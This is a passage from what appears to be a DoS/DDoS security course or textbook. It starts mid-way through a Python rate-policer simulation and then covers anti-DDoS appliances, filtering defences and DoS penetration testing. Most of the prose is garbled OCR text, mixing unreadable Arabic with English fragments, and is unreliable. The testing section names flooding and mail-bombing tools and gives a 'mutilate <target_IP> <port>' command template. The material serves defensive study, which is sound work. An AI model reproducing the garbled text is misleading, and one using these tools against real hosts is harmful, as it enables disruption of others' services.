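        self.bytes_per_sec = bps / 8        # rate is configured in bits/s
        self.burst_normal = burst_normal    # bucket depth, bytes
        self.tokens = float(burst_normal)   # bucket starts full
        self.last_t = 0.0

    def admit(self, size: int, t: float) -> bool:
        # refill for the time elapsed since the last packet, capped at the depth
        self.tokens = min(self.burst_normal,
                          self.tokens + (t - self.last_t) * self.bytes_per_sec)
        self.last_t = t
        if size <= self.tokens:
            self.tokens -= size
            return True                     # conform-action transmit
        return False                        # exceed-action drop

ACL_1 = [ip_network("192.168.2.1/32")]      # access-list 1 permit 192.168.2.1

def matches_acl(src: str, acl=ACL_1) -> bool:
    return any(ip_address(src) in net for net in acl)

def run_policy(packets, policer: CarPolicer, acl=ACL_1):
    """packets: (time_s, src_ip, size_bytes) in arrival order.
    Returns (transmitted, dropped) as lists of packet indices."""
    transmitted, dropped = [], []
    for i, (t, src, size) in enumerate(packets):
        if matches_acl(src, acl):           # only access-group 1 is policed
            (transmitted if policer.admit(size, t) else dropped).append(i)
        else:
            transmitted.append(i)           # other networks pass unpoliced
    return transmitted, dropped

def sample_run():
    # constructed: six 500-byte attacker packets at t=0, two legitimate
    # 1500-byte packets at t=0, then three more attacker packets at t=1 s
    flood = [(0.0, "192.168.2.1", 500)] * 6
    legit = [(0.0, "192.168.3.1", 1500), (0.0, "192.168.3.2", 1500)]
    later = [(1.0, "192.168.2.1", 500)] * 3
    policer = CarPolicer(bps=8000, burst_normal=2000)
    return run_policy(flood + legit + later, policer)
```

With a full 2000-byte bucket only four 500-byte attacker packets conform at t=0; after one second the bucket has refilled 1000 bytes, so two more pass and the third is dropped, while both legitimate packets are transmitted regardless.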




http://www.cisco.com



FortiDDoS-300A

Source: http://www.fortinet.com

DDoS j ^^UaWtfl ^ j j^V! ^1 j ^ ciLLo^ FortiDDoS 300A J jt 

s j^ll l^J .rate limiting j traffic profiling j ^ ^ j*4jj .o^ u' uj^ Sjo ^j^^jfe 

DDoS Protector

Source: http://www.checkpoint.com
DDOS application layer attacksj network flood ±± <jU^JI DDoS Protector 

Cisco Guard XT 5650

Source: http://www.cisco.com

lU^ ijiiL ^jL . ^ "DDoS Mitigation Appliance" o*j± ( % j^J j& Cisco Guard XT 

.<£jjuo3l dlLlL&C 4_Sa^)C (j-a Ifrxla j ^ g II JJ^Jl 4-^^>^> £^<J AjjUa/Jl CjLd^Jl < fljiaJj tAjj^Jl ^J^Jj g li < te 5^ c ' (J^ 

Arbor Pravail: Availability Protection System 

Source: http://www.arbornetworks.com
<j^aUJl ajj^JI CjU^kJI c_jUi JjS UjUIj DDoS Jia Al^Ull j 4i j^xJI djl^j^ill 3J'j]j ^ Arbor Pravail 
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DoS/DDoS Protection Tool 

DoS/DDoS Protection Tool: D-Guard Anti-DDoS Firewall
'Super DDoS 'DoS/DDoS ±± <oSj .o" uUa ±± U^JI J jj D-Guard Anti-DDoS Firewall 
'Mutation UDP 'UDP 'IP Flooding Attacks 'SYN Flooding Attacks 'Fragment Attacks 'DrDoS 
.jJI 'ARP Spoofing Attacks 'Random UDP Flooding 'ICMP Flood Attacks 'ICMP 

.DDOS 0* c?>i fcljftlj 'SYN, TCP Flooding ±± o 

.TCP Ji* c> f^ 1 O 

UDP/ICMP/IGMP P >JI Jj~ Sjb] O 

.IP Jl *LJajjll ^Ajlall j *b jjJI <*jla]l O 


DoS/DDoS Protection Tools

<jL Uij .DoS/DDoS ^ ji j3 ^1 j&\ c> ^ ^ ^D-Guard Anti-DDoS Firewall J\ 4it^VU 

: j^jli DoS/DDoS ^ ^ ^ j-ftl 

NetFlow Analyzer available at http://www.manageengine.com
SDL Regex Fuzzer available at http://www.microsoft.com
WANGuard Sensor available at http://www.andrisoft.com
NetScaler Application Firewall available at http://www.citrix.com
FortGuard DDoS Firewall available at http://www.fortguard.com
IntruGuard available at http://www.intruguard.com
DefensePro available at http://www.radware.com
DOSarrest available at http://www.dosarrest.com
Anti DDoS Guardian available at http://www.beethink.com
DDoSDefend available at http://ddosdefend.com
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Techniques to Defend Against Botnets 

•Ciii jA\ .Ua ^AA^l (Jjia ^jujt 

RFC 3704 Filtering

<jt jixJl <j^aj^aa^> t^JL^a Ujl^a JjfL LJLa>J ^ j^J! jl jA jjlall li$J <AxAjJ$\ djLUalalt .ACL J& RFC3704 

^^ajoij U s^lc .L^jljjjiJI (jijj l" allocated address space" 

f jaJl Jaliuij c^Llxi ;4_aj\I3I £>1a IP (JJjLc; ^ Ij^lS tit ."bOgOn list" 4_pLJt d)LLi*Jt jUat J l$Jt jlaii jl jLaJ 

4 jq> ^i^l j-a jill tiA ^AaJLujJ lij Li AjAajJ (j^aLklt ISP J^Vilt L_L^j Liajt .(jjj jjujl-g IP j,"U i>^)iict j *LLg ^Ld^lill 

^Lt^Vt J 6 ^ Bogon list (j^l^JI djj^yi 4-^Lt Jt 4_iaa jit jjj>Jt J j^ <J^ 4-A^uJt 

Black Hole Filtering



jjisJI jjj^t JalLiij .^Ld^kll cjL^a ^lJ ^UILj cdijj jJI ^jja ^la^ll Black Hole Filtering 

.RTBH 'Remotely Triggered Black Hole Filtering fc* ^ ^UJI aja^I J^jj jt JjS l^ja ^j&j* 

.RTBH S^Lai^j ^:^Jt l-l=^ CjL^a L-uaJ 4j^Lk b^Loj .t*L ^-aUJt ISP <>l jSlb jSlill li* pi j^j ^Ij^j 

DDoS Prevention Offerings from ISP or DDoS Service 
ci£L^aj3 "in-the-cloud DDoS protection" o*j^ ^J^JI <jUuoJI Jll^t ^SH ciij jjjVI CjU^l (j^jj* 

(j^aLklt dljjljVI Jj^J ^j) <Jj3 dljjljVI ^Ld^ ^ <-l^ L>* ^ (S f^J > u JJ^Jl ^^>^ (J' *J^*^ J (J^l^Jl CljjljVt 

Cisco IPS Source IP Reputation Filtering 

<1jU WVI c^ljUki^V! IPS 7.0 t> ^ 'Cisco Global Correlation

4 C jj*aA$JI JjuoLoi^ iC±i jjjVI cjl^j^ill Jj^ djUjkJI AilS c^j^ Cisco SensorBase Network 

Jja ^jj.aa.I^.aII ajL ols! 4£jJo3I ^l^klaa! ^ IPS .botnet harvesters j ^ CjI^jJoII tSjLjal! ^1 jJI jLoujl 
.l^oUaj a^LlSI ^j^jII djLLj ^^ic (J^Lulj <j| c^Luj Cj5 j -laLulllI ^l<i j c ^ ,3^1^!! jj^VI ^^^ic ^ j^^l 



10.9 Penetration Testing (DoS/DDoS Penetration Testing)



Denial-of-Service (DOS) Attack Penetration Testing 

£>i& ( a- - gall Jalaj j3 jJ La£ lg^.!>L^a! <!jLa^j 4_iL<»VI 1 ' 6 * - ^ali Jallj ^^ic JjisJl Jj^j (jl ( ; Vjl 6tiL <j^aLkll A^jJall (j^Ul <!jL^xi ^ 

^j-d ^->.>UJ^)3l L_fl^Jlj _<£jjuo3l a\ a V ^1x^.1^13 jLud-a 

djl ftj^S ^^ic laj (^jIIj ^^cjjuj jjc. ping j' SYN (>< ^ J^jj (j^^A 3 ^ ^ ^ ^ ' . ^ ^ r* j^ ■■V^ ^ .cJ^^VI 

.<LtLoV! cjI^suI! ^^ic jjSi*U ^l^-ftll JLtii ^lii^j ^ jjoi tiljli t^ljlkVl j;*^ o tdij .DoS vulnerabilities t ^ 1 u ^ 
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Cj| jiaaJI (j* 4_LaiLuj Ajutla Jl £"tlaj &b& (j-G -ja-vlU ^Ja^j l— )>IaJ jl <La,laJl ^^a^a CA s fj^. ^UajJt (jl£ bj U» -jo-vlM J| ^-tlaJ 
<j* UiLajl jll ja/tft -kii*kj3! Jc; tih&LuiJ liA . jblkVI (j* cJ^Jl ^J^J JjljikVI jt^aj ^ J Jj^ * 

? jt*J! Jp JUa&l jblkl :2 S jfeaJI 4- 

jJjllLuj fil£La^a Jc ^Jaii 4il .pbVlj jlj£LuiVI jLla.V (J^f*aJ jl ^LaJl J ^^cliLj^l ^-^J (j^J 3 (jC <J-aaJl jtiia.1 \) a " ^JJ 

;4JU3l CjIj^VI fl lalJ J ^La. Jc U jlila.1 ^ 

cil^Laij l^ji .dujjjVl A^f^ J^ Ajlaall Ls iA\ j ^1 jaJ *bVI j J-aa^ll jIjI^V j-^jj :Webserver Stress Tool

c> "load testing" <JaU±> J^aJI jUikV .(^S ji<JI) ^UJI J^aJI J <4«3 ^ jUlkV t*U .lU*JI jbikl *bl J 

." (real- world) 

.SSL/TLS ct^jj^ ^ jljSUj *bl jLia.V t*U sbt > :Web Stress Tester 

JMeter 

http://jmeter.apache.org

a axu^a liLa. (j^flaj j& sbVI oaa l^lxjjaj <^^j ^3 ^<JI ^1^1 jUlkV djjijVl 4£jjuj ^^ic ^ jlLa (j^flaj JMeter

.*bV! a-Uaj lU^I ^3 jL> jU^V 

4_JU3| CjIj^VI .4£jjuo3I (J^aaa (Jj^ia (jC <xi^aJl ( . La a ^ ja^J L_axjJall JsIaj ^^Ic <J gaai] ^Uaill c3^-^ ( ♦ ^ J J^ 1 ^^ j;*^ a 

^jlj^aJlj t JjxjuHII .ial_L<Jl d^A (^Ic (Jasu CjUi^aJlj tiallxJl <!La. Ls lc Jj5*ll l^l^ajjoal (j^J obi j& :Nmap

,A_L<i jjuj^)3I ^a^ajjauJl 4-g-aJ j ^nlaj£ jl j^l jVl ^ajuj ^j-<» Nmap l!^*-^ .CjLajoi^Jl j AjjUII 

GFI LANguard ^> cjU^I c j^j cj^i J^Uj ^1 sbl :GFI LANguard 

^Uaill ^glc l^a.1 jJ <^Ll! L_kstjJa3l Jallj <J ja. (j^^aJjab<Jl ^Lnlij tS^Aa^a JP ^JjjUc <C a jl XP £)\ bUluai ;4£jjaJl ^aaij 

CjUUJI 6 asset profiling 'configuration auditing J^j .u^j^^j ( ^ ^ :Nessus 

^jliJI Jp SYN :4 SjIaiJI 4- 

.PHP DoS <Sprut ^DoS HTTP :SYN 0^ Vl^l U\^\ ch\ 
^jliJI Jp "port flooding" iiiall ^ cjUU^I cjU^a JJuij : 5 S jkkJl J_ 

^^jaLiJ^)]! ^pa^iJlj . liLoll b^ Jc 4^^aJl ^j-d ^jU»^)aJl (j^a.J '(j^*-^ Jj UDP TCP ^3^" L>^ (J^J^ ^fllall CjULjajS 

Jc ^ j^-jl I^A ^JJ (jl (j^J .^100 Jj ^j^J-^^ 4_aJlsLxJl S*la.j laJLujj o^Ujj JlAxlaj!>l! 4_aJU^ jjc. ialixJl cJ*^ f J?^^ ^ L>^ 

;iall<Jl CjU > ^ ^jaJ^ pi ja.V AJUll CjIjjVI ^h^unl .UDPj TCP 

j-aVl ^l^ajjajl .TCP/IP ^l^ua t-fl^ioij obVl .lJ^JI Jc^ 5ja jjLJI iflUJ! ^j^j3 LajLajl ^^laaj :Mutilate 

Mutilate J^l 

mutilate <target_IP> <port>

J Jaxj ^1 sbVI 

^Uajaa A\ \ >^>^^o Laa j b^ J^j^j UDP L-fl^laaj Pepsi5 ^bl :Pepsi5 

uH j^i cf^^ ^i^«JI ^jojI plia.y stealth J^*-^ ^ J ^laJl 
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^j>£Wt jjjJI ?SL± "email bomber" <^jj2£NI jjjJI *i3t5 J^u : 6 SjkaJl ^ 

Mail Bomber 

Source: http://www.getfreefile.com/bomber.html
tSlljliVI (JjjLujI fbv^U ajjLoJI ^ jj^V' iJjI^j J^jjV >v^>»n ^UJI sbl ^ Mail Bomber 

^jjJI JjU jj QtlJ Z \ * s>i\A aj^jJI ^jIjSII c> ^ ^ ^ SjiS ^ ."subscription-based mailing lists" 

.0^3! c-ifc~J SMTP ^ >j <cP JJ^V 1 
Advanced Mail Bomber 
Source: http://www.softheap.com

lJIjS <> dijjijVI ^ ^ij^ ^ (jj^ji^JI (j* ji& n*l aj^l^ JjL-j JL-jj I jiS Advanced Mail Bomber 
ji^i ^Aili^xJI xj > >>1 ^<JI 48 SMTP ^ 48 cJ^^ ^ ^ lW-*^ t^j^ ^-^^ %^*a 

.jj-G^kluuJI cjLLiLu ^iii Liajl ^j^dj sbVl *>i& .^31 4<J^jM 'SMTP ^1 ^ V jffi^ <x±*jA\ 
"Flood the website forms and guestbook with bogus entries" (j^J J^M jtjjJt J^J ^Ij^]) Jljfel :7 SjkaJ) J_ 

jj^J Aijjj :8 S jla^l i- 



^IjaII dlL ^li ^ Ujflj JU^I Ija ^ djS JlsSrt ^SSSl .CEHv8 

- Internet Denial of Service: Attack and Defense Mechanisms, by Jelena Mirkovic
- DDoS Survival Handbook
- An Investigation into the Detection and Mitigation of Denial of Service (DoS)
- Denial of Service Attacks and Mitigation Techniques, by SANS
- Internet Denial of Service Attacks and Defense Mechanisms, by Mehmud Abliz
- Malware, Rootkits & Botnets: A Beginner's Guide
- Other information from other websites
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